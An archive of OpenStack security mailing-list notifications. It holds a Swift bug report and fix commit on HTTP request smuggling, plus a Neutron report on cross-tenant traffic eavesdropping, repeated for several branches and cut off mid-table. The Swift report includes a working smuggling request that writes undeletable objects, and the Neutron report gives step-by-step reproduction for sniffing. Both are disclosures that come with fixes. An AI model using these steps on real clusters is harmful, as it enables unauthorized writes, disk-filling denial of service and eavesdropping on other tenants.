From 1840507 at bugs.launchpad.net Wed Oct 2 23:09:56 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 02 Oct 2019 23:09:56 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157005779668.31915.12084075468045263419.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/684041 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=bf9346d88de2aeb06da3b2cde62ffa6200936367 Submitter: Zuul Branch: master commit bf9346d88de2aeb06da3b2cde62ffa6200936367 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 Fix some request-smuggling vectors on py3 A Python 3 bug causes us to abort header parsing in some cases. We mostly worked around that in the related change, but that was *after* eventlet used the parsed headers to determine things like message framing. As a result, a client sending a malformed request (for example, sending both Content-Length *and* Transfer-Encoding: chunked headers) might have that request parsed properly and authorized by a proxy-server running Python 2, but the proxy-to-backend request could get misparsed if the backend is running Python 3. As a result, the single client request could be interpretted as multiple requests by an object server, only the first of which was properly authorized at the proxy. Now, after we find and parse additional headers that weren't parsed by Python, fix up eventlet's wsgi.input to reflect the message framing we expect given the complete set of headers. As an added precaution, if the client included Transfer-Encoding: chunked *and* a Content-Length, ensure that the Content-Length is not forwarded to the backend. Change-Id: I70c125df70b2a703de44662adc66f740cc79c7a9 Related-Change: I0f03c211f35a9a49e047a5718a9907b515ca88d7 Closes-Bug: 1840507 ** Changed in: swift Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:03:02 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:03:02 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/rocky) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157008978228.31991.783321841512001254.malone@wampee.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/686345 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:15:10 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:15:10 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/queens) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157009051028.31991.3832865490035166401.malone@wampee.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/686346 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:20:12 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:20:12 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/pike) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157009081243.16450.14118186781274603010.malone@gac.canonical.com> Fix proposed to branch: stable/pike Review: https://review.opendev.org/686347 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | 